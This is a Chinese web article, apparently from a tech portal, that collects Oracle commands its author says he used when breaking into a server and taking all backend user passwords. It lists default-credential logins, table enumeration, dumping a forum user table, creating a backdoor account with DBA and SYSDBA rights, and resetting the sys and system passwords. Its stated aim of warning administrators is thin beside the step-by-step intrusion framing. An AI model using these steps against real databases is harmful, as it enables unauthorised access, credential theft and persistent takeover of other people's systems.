您所在的位置: 首页 > 网络安全 > 应用安全 > 数据库安全 >

入侵Oracle数据库时常用的操作命令整理

  • 摘要:本文给出作者整理的入侵Oracle数据库时常用的操作命令,希望能给数据库管理员一定的警示,注意减少漏洞,防止被黑客利用来进行攻击。
  • 标签:操作  命令  入侵  Oracle

最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码,我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来,一个星期的心血,版权所有,转载请注明作者。

1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。

2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;

3、SQL>connect / as sysdba ;(as sysoper)或 connect internal/oracle AS SYSDBA ;(scott/tiger)

conn sys/change_on_install as sysdba;

4、SQL>startup; 启动数据库实例

5、查看当前的所有数据库

select * from v$database;

select name from v$database;

desc v$databases; 查看数据库结构字段

6、怎样查看哪些用户拥有SYSDBA、SYSOPER权限

SQL>select * from V_$PWFILE_USERS;

Show user;查看当前数据库连接用户

7、进入test数据库:database test;

8、查看所有的数据库实例:

select * from v$instance;

如:ora9i

9、查看当前库的所有数据表:

SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_

10、查看表结构:desc all_tables;

11、显示CQI.T_BBS_XUSER的所有字段结构:

desc CQI.T_BBS_XUSER;

12、获得CQI.T_BBS_XUSER表中的记录:

select * from CQI.T_BBS_XUSER;

13、增加数据库用户:(test11/test)

create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;

14、用户授权

grant connect,resource,dba to test11;
grant sysdba to test11;
commit;

15、更改数据库用户的密码:(将sys与system的密码改为test.)

alter user sys indentified by test;
alter user system indentified by test;

【责任编辑:火凤凰 TEL:(010)68476606-8007】

Oracle以74亿美元收购Sun
Oracle 11g新特性与应用详解
微软下一代操作系统:Windows 7
甲骨文Oracle 11g正式发布
Oracle数据库开发之PL/SQL基础应用
 
 验证码: (点击刷新验证码)   匿名发表
  • 亮剑.NET. 图解C#开发实战

  • 作者:李新峰 付志涛 缪勇
  • 本书采用全新的图解思路,分3篇介绍使用微软C#语言开发实际应用程序的基本知识。第1篇包括10章,介绍了C#语言的基础知识,主要..
Copyright©2005-2009 51CTO.COM 版权所有